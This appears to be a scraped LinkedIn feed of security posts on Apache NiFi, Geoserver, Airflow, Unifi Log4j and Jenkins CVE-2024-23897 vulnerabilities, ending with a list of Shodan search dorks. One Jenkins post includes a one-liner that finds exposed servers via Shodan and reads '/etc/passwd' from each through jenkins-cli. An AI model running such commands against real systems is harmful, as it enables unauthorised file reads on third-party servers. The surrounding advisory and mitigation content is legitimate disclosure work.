Apache NiFi’s Post

#Vulnerability #ApacheNiFi PoC Exploit Released for Apache NiFi Code Execution Vulnerability (CVE-2023-34212)

Dependency Confusion Vulnerability Found in Apache Project: This occurs when a private package fetches a similar public one, leading to exploit due to misconfigurations in package managers

Geoserver CVE-2023-41877 was published yesterday, a path traversal vulnerability. I found this some time ago and explored the possibilties apart from disclosing information stored in server files. The advisory says that it could lead to RCE and it is not just by getting credentials from files or whatever, abusing just this vulnerability and Geoserver is enough under certain circumstances. I decided to publish a little article about how to leverage RCE by just abusing this vulnerability. The idea is to encourage Geoservers administrators to apply the proper mitigation steps.

🌐 Bridging Data Orchestration and Cybersecurity: A Must-Read from Jarek Potiuk! 🌐 This is to all my data network from back when I worked at Astronomer 😉 I'm thrilled to share an insightful article written by my former colleague that resonates deeply with my professional journey. Transitioning from data orchestration to cybersecurity, it's exciting to see these worlds intersect in meaningful ways. This piece delves into a recent security vulnerability within Apache Airflow, exploring the challenges and remediations in open-source development. From discovering a subtle typo in GitHub Actions to implementing strategic security enhancements, the article is a journey into the complexities of cybersecurity. 👉 Highly recommended for insights into the evolving landscape of tech security: https://lnkd.in/dVM2Jn3a #CyberSecurity #DataOrchestration #ApacheAirflow #TechInsight

If you are into Open-Source Security, this blog post describes a story of security vulnerability reported to Apache Airflow - that could potentially get very bad. It shows the strength of The Apache Software Foundation security process as defined now, but also how individuals empowered by funding from Sovereign Tech Fund can add extra layers of protection and strenghten the release process even more. A bit cautionary tale for maintainers to pay attention to securing their release process, but also hopefull view on emerging funding models that will put security process front and center - especially in the light of upcoming regulations in EU and US. Thanks to Harish P for reporting the original issue.

Exploiting Log4j Vulnerabilities in Unifi Software. Learn how to: - Gain reverse shell access - Add an administrative user to the Unifi MongoDB instance To automate this process we have released a GitHub repository to exploit the vulnerability: 🔗 https://lnkd.in/gQ-zpXeF Read the full article here: 👇 https://lnkd.in/g9YzVEBx

Multiple PoC exploits released for Jenkins flaw CVE-2024-23897: Multiple proof-of-concept (PoC) exploits for recently disclosed critical Jenkins vulnerability CVE-2024-23897 have been released. Researchers warn that several proof-of-concept (PoC) exploits targeting the recently disclosed critical Jenkins vulnerability, CVE-2024-23897, have been made public. Jenkins is the most popular open source automation server, it is maintained by CloudBees and the Jenkins community. The automation server supports developers […]

Is the args4j vulnerability in Jenkins (CVE-2024-23897) the beginning of another log4j? https://lnkd.in/ge2Q9pKB

Jenkins has Recently released a security advisory on unauthenticated file read vulnerability ( CVE-2024-23897). The vulnerability was a result of a third-party library called args4j which was used to parse the commands from Jenkins-cli utility. Here is a quick oneliner to identify the vulnerability among public Jenkins instances that are exposed on the internet. uncover -shodan "X-Jenkins"|httpx| xargs -I % sh -c 'echo %;java -jar jenkins-cli.jar -s %/ -http help 1 "@/etc/passwd";echo "-----------------------";exit 0;' Make sure you have the following tools installed -> https://lnkd.in/gUTtuaRP -> https://lnkd.in/gT75H4pE -> jenkins-cli utility Vulnerable instances would result in exposing the first line of the /etc/passwd file as an Error Message. Mitigation Steps -> Upgrading Jenkins to 2.442, LTS 2.426.3 -> As an Immediate step we can disable the Jenkins CLI, more details here https://lnkd.in/gpbuARMA #vulnerability #cve #jenkins #security

Some Shodan Dorks that might useful in Bug Bounty 💻. 1. org:"http://target.com" 2. http.status:"<status_code>" 3. product:"<Product_Name>" 4. port:<Port_Number> “Service_Message” 5. port:<Port_Number> “Service_Name” 6. http.component:"<Component_Name>" 7. http.component_category:"<Component_Category> 8. http.waf:"<firewall_name>" 9. http.html:"<Name>" 10. http.title:"<Title_Name>" 11. ssl.alpn:"<Protocol>" 12. http.favicon.hash:"<Favicon_Hash>" 13. net:"<Net_Range>" (for e.g. 104.16.100.52/32) 14. http://ssl.cert.subject.cn:"<http://Domain .com>" 15. asn:"<ASnumber>" 16. hostname:"<hosthame>" 17. ip:"<IP_Address>" 18. all:"<Keyword>" 19. “Set-Cookie: phpMyAdmin” 20. “Set-Cookie: lang=" 21. “Set-Cookie: PHPSESSID" 22. “Set-Cookie: webvpn” 23. “Set-Cookie:webvpnlogin=1" 24. “Set-Cookie:webvpnLang=en” 25. “Set-Cookie: mongo-express=" 26. “Set-Cookie: user_id=" 27. “Set-Cookie: phpMyAdmin=" 28. “Set-Cookie: _gitlab_session” 29. “X-elastic-product: Elasticsearch” 30. “x-drupal-cache” 31. “access-control-allow-origin” 32. “WWW-Authenticate” 33. “X-Magento-Cache-Debug” 34. “kbn-name: kibana”